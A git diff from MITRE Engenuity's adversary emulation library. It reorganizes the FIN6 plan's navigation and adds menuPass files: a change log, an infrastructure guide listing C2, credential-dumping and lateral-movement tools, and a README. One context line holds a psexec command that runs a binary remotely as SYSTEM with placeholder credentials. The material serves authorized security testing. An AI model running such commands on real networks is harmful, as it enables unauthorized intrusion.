+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
diff --git a/fin6/Emulation_Plan/Phase2.md b/fin6/Emulation_Plan/Phase2.md
index 36a3a557..9b678b3f 100644
--- a/fin6/Emulation_Plan/Phase2.md
+++ b/fin6/Emulation_Plan/Phase2.md
@@ -357,3 +357,17 @@ FIN6 Procedure
 ```sh
 psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
 ```
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
diff --git a/fin6/Emulation_Plan/README.md b/fin6/Emulation_Plan/README.md
index 227d9ea4..86294bc0 100644
--- a/fin6/Emulation_Plan/README.md
+++ b/fin6/Emulation_Plan/README.md
@@ -1,19 +1,44 @@
-# FIN6 Emulation Plan
+# FIN6 Adversary Emulation
 
-This folder contains the core components of the FIN6 emulation plan. Each component is summarized below, explained in detail in the recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing this emulation plan's release, and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
+This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
 
-The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their Operations in two major Phases:
+FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015. FIN6 has targeted e-commerce sites and multinational organizations. Most of the group’s targets have been located in the United States and Europe, but include companies in Australia, Canada, Spain, India, Kazakhstan, Serbia, and China.<sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>
 
-- Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (eg credentials).
+The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK.  In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile.  This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical order of the major steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their operations in two major phases:
+
+- Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (e.g. text files resulting from Discovery and credentials).
 - Phase 2: This phase consists of the specific objectives or effects of the operation. We provide three potential options for specific objectives, based on historical FIN6 operations.
 
-The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version, yet remains universal/agnostic of any specific parser and runner. We will accept PRs to capture versions of the YAML ported to work with specific execution frameworks [here](YAMLs).
+The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
 
 ## Table of Contents
 
-- [Intelligence Summary](/fin6/Intelligence_Summary.md)
-- [Operations Flow](/fin6/Operations_Flow.md)
-- [Emulation Plan](/fin6/Emulation_Plan/README.md)
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
   - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
   - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
-  - [YAML](/fin6/Emulation_Plan/FIN6.yaml)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
+Copyright 2020 MITRE Engenuity. Approved for public release. Document number CT0006
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
diff --git a/fin6/Emulation_Plan/YAML/README.md b/fin6/Emulation_Plan/YAML/README.md
deleted file mode 100644
index 422e8668..00000000
--- a/fin6/Emulation_Plan/YAML/README.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# Machine-Readable FIN6 Emulation Plans
-
-The universal, technology-agnostic version of the FIN6 emulation plan YAML is provided [here](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml). This folder will store versions of this file formated to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
-
-## Included Formats
-
-As new files are added, please list them in the below table.
-
-| File | Execution Framework | Notes |
-| --- | --- | --- |
-| Link_To_File | Execution_Framework_Name | Any additional notes/tips for usage |
diff --git a/fin6/Emulation_Plan/FIN6.yaml b/fin6/Emulation_Plan/yaml/FIN6.yaml
similarity index 100%
rename from fin6/Emulation_Plan/FIN6.yaml
rename to fin6/Emulation_Plan/yaml/FIN6.yaml
diff --git a/fin6/Emulation_Plan/yaml/README.md b/fin6/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..ff9ca56e
--- /dev/null
+++ b/fin6/Emulation_Plan/yaml/README.md
@@ -0,0 +1,25 @@
+# Machine-Readable FIN6 Emulation Plans
+
+The universal, technology-agnostic version of the FIN6 emulation plan YAML has been provided as starting point for machine parsing and execution of the FIN6 emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [FIN6.yaml](/fin6/Emulation_Plan/yaml/FIN6.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
diff --git a/fin6/Intelligence_Summary.md b/fin6/Intelligence_Summary.md
index 398cff44..16d7d5a5 100644
--- a/fin6/Intelligence_Summary.md
+++ b/fin6/Intelligence_Summary.md
@@ -109,7 +109,14 @@ ID | Source | Publisher | Date |
 
 ---
 
-## Next Steps
-
-- [FIN6 Operations Flow](/fin6/Operations_Flow.md)
-- [FIN6 Phase 1](/fin6/Emulation_Plan/Phase1.md)
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
\ No newline at end of file
diff --git a/fin6/Operations_Flow.md b/fin6/Operations_Flow.md
index 70bd777c..bdc59e3d 100644
--- a/fin6/Operations_Flow.md
+++ b/fin6/Operations_Flow.md
@@ -14,7 +14,7 @@ This FIN6 emulation is split into two distinct phases, [Phase 1](/fin6/Emulation
 
 ## Initial Access
 
-Phase 1 is the pursuit of enabling objectives, the first of which is initial access to the target network.  FIN6 appears to take a pragmatic approach toward delivery, varying techniques according to what is most likely to be successful.  It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.  
+Phase 1 is the pursuit of enabling objectives, the first of which is initial access to the target network.  FIN6 appears to take a pragmatic approach toward delivery, varying techniques according to what is most likely to be successful.  It is therefore, recommended for the purpose of threat emulation, that assessors approach delivery in the same manner.
 
 For teams that intend to emulate the threat for every stage of the kill-chain and assess their organization’s ability to protect, as well as detect and respond it may be prudent to approach this step from a red team perspective.  Conduct reconnaissance and choose a method of delivery that has the highest likelihood of successful delivery and exploitation.  For teams that are primarily interested in assessing their organization’s ability to detect and respond to FIN6 activity, it may not be worth the investment of resources.  For these assessors, it is recommended that you assume breach using the C2 framework of your choice.  FIN6 has made use of CobaltStrike and Metasploit.  Koadic C2 may be a good option to emulate the more_eggs implant.  FIN6 is reported to have maintained C2 over HTTPS.  
 
@@ -24,11 +24,11 @@ After gaining access to the target network, FIN6 enumerates the network and Acti
 
 ## Privilege Escalation
 
-The third objective of Phase 1 is to escalate privileges.  Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.  FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.  The information therein enables the group to move freely throughout the domain and pursue their Phase 2 objectives.  Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully.  In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account.  This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.  
+The third objective of Phase 1 is to escalate privileges.  Reporting suggests the group has purchased credentials, made heavy use of credential access, and used the “getsystem” modules included in publicly available penetration testing frameworks.  FIN6 has been reported to further compromise the Windows domain by copying and exfiltrating the Active Directory database (NTDS.dit) file.  The information therein enables the group to move freely throughout the domain and pursue their Phase 2 objectives.  Privilege escalation can be challenging, it is recommended that you choose your initial target for “compromise” carefully.  In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account.  This white-carded event could enable the assessing team to escalate via credential access as the procedures described herein require elevated privileges.
 
 ## Exfiltration
 
-The terminating event for Phase 1 is exfiltration of Phase 1 data.  FIN6 has exfiltrated the text files resultant from Discovery and the NTDS.dit file harvested during Privilege Escalation by way of SSH and FTP.  These files are reported to have been pushed to FIN6 controlled infrastructure for processing and analysis.  The information ascertained enables the group to pursue their Phase 2 objectives.  
+The terminating event for Phase 1 is exfiltration of Phase 1 data.  FIN6 has exfiltrated the text files resultant from Discovery and the NTDS.dit file harvested during Privilege Escalation by way of SSH and FTP.  These files are reported to have been pushed to FIN6 controlled infrastructure for processing and analysis.  The information ascertained enables the group to pursue their Phase 2 objectives.
 
 ---
 
@@ -40,12 +40,18 @@ Escalating privileges during Phase 1 may require lateral movement.  The lateral
 
 ## Exfiltration
 
-The terminus of this phase and likewise, this emulation plan is the exfiltration of Phase 2 data.  FIN6 has used DNS tunneling to exfiltrate PoS data.  When targeting e-commerce sites, the group’s card skimming scripts exfiltrate payment data by using an HTTP POST to send the data to FIN6 controlled infrastructure.  
+The terminus of this phase and likewise, this emulation plan is the exfiltration of Phase 2 data.  FIN6 has used DNS tunneling to exfiltrate PoS data.  When targeting e-commerce sites, the group’s card skimming scripts exfiltrate payment data by using an HTTP POST to send the data to FIN6 controlled infrastructure.
 
 ---
 
-## Next Steps
-
-- [FIN6 Intelligence Summary](/fin6/Intelligence_Summary.md)
-- [FIN6 Phase 1](/fin6/Emulation_Plan/Phase1.md)
-- [FIN6 Phase 2](/fin6/Emulation_Plan/Phase2.md)
+## Additional Plan Resources
+
+* [Intelligence Summary](/fin6/Intelligence_Summary.md)
+* [Operations Flow](/fin6/Operations_Flow.md)
+* [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
+  - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
+  - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
+  - [YAML](/fin6/Emulation_Plan/yaml/FIN6.yaml)
+* [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+* [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
diff --git a/fin6/README.md b/fin6/README.md
index 16f4b50a..86294bc0 100644
--- a/fin6/README.md
+++ b/fin6/README.md
@@ -1,26 +1,27 @@
 # FIN6 Adversary Emulation
 
-This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be). 
+This repository contains an adversary emulation plan for [FIN6](https://attack.mitre.org/groups/G0037/). This is the first emulation plan in a [library](https://github.com/center-for-threat-informed-defense/adversary_emulation_library) published by the [Center for Threat Informed Defense](https://mitre-engenuity.org/center-for-threat-informed-defense/) in cooperation with our participants. See our recent [blog](https://medium.com/mitre-engenuity/center-releases-fin6-adversary-emulation-plan-775d8c5ebe9b) announcing the release of this emulation plan and the [video walkthrough](https://www.youtube.com/watch?v=n5jeGSOyJzY&feature=youtu.be).
 
 FIN6 is thought to be a financially motivated cyber-crime group. The group has aggressively targeted and compromised high-volume POS systems in the hospitality and retail sectors since at least 2015. FIN6 has targeted e-commerce sites and multinational organizations. Most of the group’s targets have been located in the United States and Europe, but include companies in Australia, Canada, Spain, India, Kazakhstan, Serbia, and China.<sup>[5](https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24)</sup>
 
-The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK.  In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile.  This information has been provided to the ATT&CK team for analysis and potential incorporation.  
+The Intelligence Summary summarizes 15 publicly available sources to describe FIN6, their motivations, objectives, and observed target industries. It further describes the typical FIN6 Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK.  In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's FIN6 group profile.  This information has been provided to the ATT&CK team for analysis and potential incorporation.
 
 The Operations Flow chains techniques together into a logical order of the major steps that commonly occur across FIN6 operations. In the case of FIN6, we describe their operations in two major phases:
 
 - Phase 1: The primary focus of this phase is initial access and placement within the target environment, and exfiltrating relevant data identified during this phase (e.g. text files resulting from Discovery and credentials).
 - Phase 2: This phase consists of the specific objectives or effects of the operation. We provide three potential options for specific objectives, based on historical FIN6 operations.
 
-The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version. 
+The FIN6 emulation plan is a human-readable, step-by-step / command-by-command implementation of FIN6 TTPs. Structurally, the plan is organized into 2 phases, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for both Phase 1 and Phase 2. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
 
 ## Table of Contents
 
 * [Intelligence Summary](/fin6/Intelligence_Summary.md)
 * [Operations Flow](/fin6/Operations_Flow.md)
 * [Emulation Plan](/fin6/Emulation_Plan/README.md)
+  - [Infrastructure](/fin6/Emulation_Plan/Infrastructure.md)
   - [Phase 1](/fin6/Emulation_Plan/Phase1.md)
   - [Phase 2](/fin6/Emulation_Plan/Phase2.md)
-  - [YAML](/fin6/Emulation_Plan/FIN6.yaml)
+  - [YAML](/fin6/Emulation_Plan/yaml)
 * [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
 * [Change Log](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/CHANGE_LOG.md)
 
diff --git a/menuPass/Attack_Layers/ChChes_S0144.png b/menuPass/Attack_Layers/ChChes_S0144.png
new file mode 100644
index 00000000..1aeeb782
Binary files /dev/null and b/menuPass/Attack_Layers/ChChes_S0144.png differ
diff --git a/menuPass/Attack_Layers/Cobalt_Strike_S0154.png b/menuPass/Attack_Layers/Cobalt_Strike_S0154.png
new file mode 100644
index 00000000..802b1709
Binary files /dev/null and b/menuPass/Attack_Layers/Cobalt_Strike_S0154.png differ
diff --git a/menuPass/Attack_Layers/EvilGrab_S0152.png b/menuPass/Attack_Layers/EvilGrab_S0152.png
new file mode 100644
index 00000000..d131e3a6
Binary files /dev/null and b/menuPass/Attack_Layers/EvilGrab_S0152.png differ
diff --git a/menuPass/Attack_Layers/Koadic_S0250.png b/menuPass/Attack_Layers/Koadic_S0250.png
new file mode 100644
index 00000000..946ffbc4
Binary files /dev/null and b/menuPass/Attack_Layers/Koadic_S0250.png differ
diff --git a/menuPass/Attack_Layers/PlugX_S0013.png b/menuPass/Attack_Layers/PlugX_S0013.png
new file mode 100644
index 00000000..8896e54e
Binary files /dev/null and b/menuPass/Attack_Layers/PlugX_S0013.png differ
diff --git a/menuPass/Attack_Layers/PoisonIvy_S0012.png b/menuPass/Attack_Layers/PoisonIvy_S0012.png
new file mode 100644
index 00000000..bd2c3bf2
Binary files /dev/null and b/menuPass/Attack_Layers/PoisonIvy_S0012.png differ
diff --git a/menuPass/Attack_Layers/QuasarRAT_S0262.png b/menuPass/Attack_Layers/QuasarRAT_S0262.png
new file mode 100644
index 00000000..0227cc28
Binary files /dev/null and b/menuPass/Attack_Layers/QuasarRAT_S0262.png differ
diff --git a/menuPass/Attack_Layers/RedLeaves_S0153.png b/menuPass/Attack_Layers/RedLeaves_S0153.png
new file mode 100644
index 00000000..3aac9a27
Binary files /dev/null and b/menuPass/Attack_Layers/RedLeaves_S0153.png differ
diff --git a/menuPass/Attack_Layers/menuPass_G0045.png b/menuPass/Attack_Layers/menuPass_G0045.png
new file mode 100644
index 00000000..b79fa193
Binary files /dev/null and b/menuPass/Attack_Layers/menuPass_G0045.png differ
diff --git a/menuPass/CHANGE_LOG.md b/menuPass/CHANGE_LOG.md
new file mode 100644
index 00000000..71c756e7
--- /dev/null
+++ b/menuPass/CHANGE_LOG.md
@@ -0,0 +1,7 @@
+# Change Log
+
+## menuPass Emulation Plan
+
+|Version | Date | Change Details |
+|:---|:---|:---|
+| 1.0 | 04 February 2021 | Adversary Emulation Library Release
diff --git a/menuPass/Emulation_Plan/Infrastructure.md b/menuPass/Emulation_Plan/Infrastructure.md
new file mode 100644
index 00000000..584ce0b4
--- /dev/null
+++ b/menuPass/Emulation_Plan/Infrastructure.md
@@ -0,0 +1,86 @@
+# Infrastructure
+
+menuPass actors are reported to have maintained distributed infrastructure that is often associated with dynamic-DNS or actor registered domains.  This infrastructure may have been maintained and reused across disparate operations.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  menuPass infrastructure is used for phishing, command and control (C2), payload hosting/delivery, and exfiltration.
+
+---
+
+## Emulation Team Infrastructure
+
+The infrastructure listed below is a recommendation, not a requirement.  We hope to capture the general structure of what is reported to have been seen being used by menuPass.  If you have the time and resources to remain true-to-form, you may elect to stand up multiple of each of these servers, ensuring that you use different service providers, and non-contiguous IP space, etc.  If you are not concerned with emulating menuPass to this degree, this level of effort is not necessary.  You could for instance, phish, serve payload, and exfil from/to the same server. The following represents a bare minimum but should be operationally representative of menuPass infrastructure and toolset:
+
+* Redirectors
+  * menuPass actors are thought to have used redirectors to proxy C2 traffic.  To remain operationally representative, you may consider establishing redirectors to relay your traffic with any of the available cloud service providers.  If you wish to maintain C2 over HTTPS, consider [Let's Encrypt](https://letsencrypt.org) for free SSL/TLS certificates.
+
+* Phishing Servers (Optional)
+  * Aside from exploiting trust relationships, menuPass is widely reported to have phished for initial access.  There are, a few ways to approach phishing.  The most resource intensive would be to stand up a phishing server.  This is not necessary to remain operationally representative but is mentioned to those interested in assessing their organization's ability to protect, detect, and defend to phishing.
+
+* Payload Servers
+  * In some instances, menuPass actors are reported to have used download cradles to fetch and execute payloads.  These download cradles request the payload from a payload server, whose purpose is simply...to serve payloads.  If you are concerned with maintaining distributed infrastructure, you may elect to set up a sever dedicated to this purpose.
+
+* Exfiltration Servers
+  * menuPass actors have been observed staging, compressing, and exfiltrating data from target networks.  Data is commonly reported to have been "pushed" from the network.  To emulate this activity, you will need to establish an exfiltration server that is capable of receiving connections from tools like PuTTY/PSCP.
+
+---
+
+## Emulation Team Infrastructure Configuration
+
+Detailing specific infrastructure configuration is beyond the scope of this plan. Please consult the following resources:
+
+* [Cloud-based Redirectors for Distributed Hacking](https://blog.cobaltstrike.com/2014/14/cloud-based-redirectors-for-distributed-hacking/)
+* [Infrastructure for Ongoing Red Team Operations](https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations)
+* [HTTPS Payload and C2 Redirectors](https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/)
+* [Red Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
+* [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
+
+---
+
+## Emulation Team Systems and Tools
+
+The tools listed hereafter are reported to have been used by menuPass, hence their inclusion in our plan.  In most cases, the exact command-line implementation of the tool is an educated guess.  These tools are recommendations, not requirements.  Our intent is to encourage a defensive posture that is informed by TTPs, not by tools.  Please feel free to use whatever toolset best suits your use case.
+
+  * C2 Framework
+    * [Koadic](https://github.com/zerosum0x0/koadic)
+  * Implants
+    * [Quasar](https://github.com/quasar/Quasar)
+  * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
+  * [Wmiexec](https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs)
+  * Impacket
+    * [Secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)
+    * [Atexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py)
+    * [Psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py)
+  * [PyInstaller](https://pyinstaller.org)
+  * Impacket Binaries - alternative to compiling the above python scripts with PyInstaller
+    * [Compiled](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.22.dev-binaries)
+  * [Nbtscan](https://unixwiz.net/tools/nbtscan.html)
+  * [Netsess](https://joeware.net/freetools/tools/netsess)
+  * [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases)
+  * [Tcping](https://elifulkerson.com/projects/tcping.php)
+  * [Winrar](https://rarlab.com) (optional)
+  * [PuTTY/PSCP](https://chiark.greenend.org.uk/~sgtatham/putty/latest.html)
+  * [cURL](https://curl.haxx.se/windows)
+
+---
+
+## Target Infrastructure
+
+Much of the publicly reported menuPass activity has been directed against Windows Domains.  This plan was designed accordingly.  To execute this plan, you will require at a minimum, the following:
+
+* 1 Domain controller
+* 2 Workstations
+* 2 Servers
+* Multiple accounts with varying levels of privilege
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
diff --git a/menuPass/Emulation_Plan/OpFlow_Diagram.png b/menuPass/Emulation_Plan/OpFlow_Diagram.png
new file mode 100644
index 00000000..5dea81b6
Binary files /dev/null and b/menuPass/Emulation_Plan/OpFlow_Diagram.png differ
diff --git a/menuPass/Emulation_Plan/README.md b/menuPass/Emulation_Plan/README.md
new file mode 100644
index 00000000..5b261a0c
--- /dev/null
+++ b/menuPass/Emulation_Plan/README.md
@@ -0,0 +1,43 @@
+# menuPass Adversary Emulation
+
+menuPass is thought to be motivated by collection objectives that align with Chinese national interests. The group's targeting is consistent with China's strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan. While most of the group's targets have been located in the United States and Japan, the group has also been linked to intrusions in at least 12 other countries.
+
+The Intelligence Summary summarizes 32 publicly available sources to describe menuPass, their motivations, objectives, and observed target industries. It further describes the typical menuPass Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's menuPass group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across menuPass operations. At a macro level, the publicly available reporting attributed to menuPass can be organized into two categories.  One being reporting specific to menuPass activities directed against MSP subscriber networks.  The other being activity that generally was initiated by spearphishing and leveraged a command-and-control framework to achieve operational objectives.  Thus, we have organized the menuPass emulation plan into two scenarios.
+
+- Scenario 1: This scenario is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks.  The intent of this scenario is to assess your organization's ability to protect, detect, and defend execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration.
+- Scenario 2: This scenario is designed to emulate activity attributed to menuPass that entails the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, C2, and persistence using a command-and-control framework.
+
+The menuPass emulation plan is a human-readable, step-by-step / command-by-command implementation of menuPass TTPs. Structurally, the plan is organized into 2 scenarios, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for Scenario 1. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
+
+## Table of Contents
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
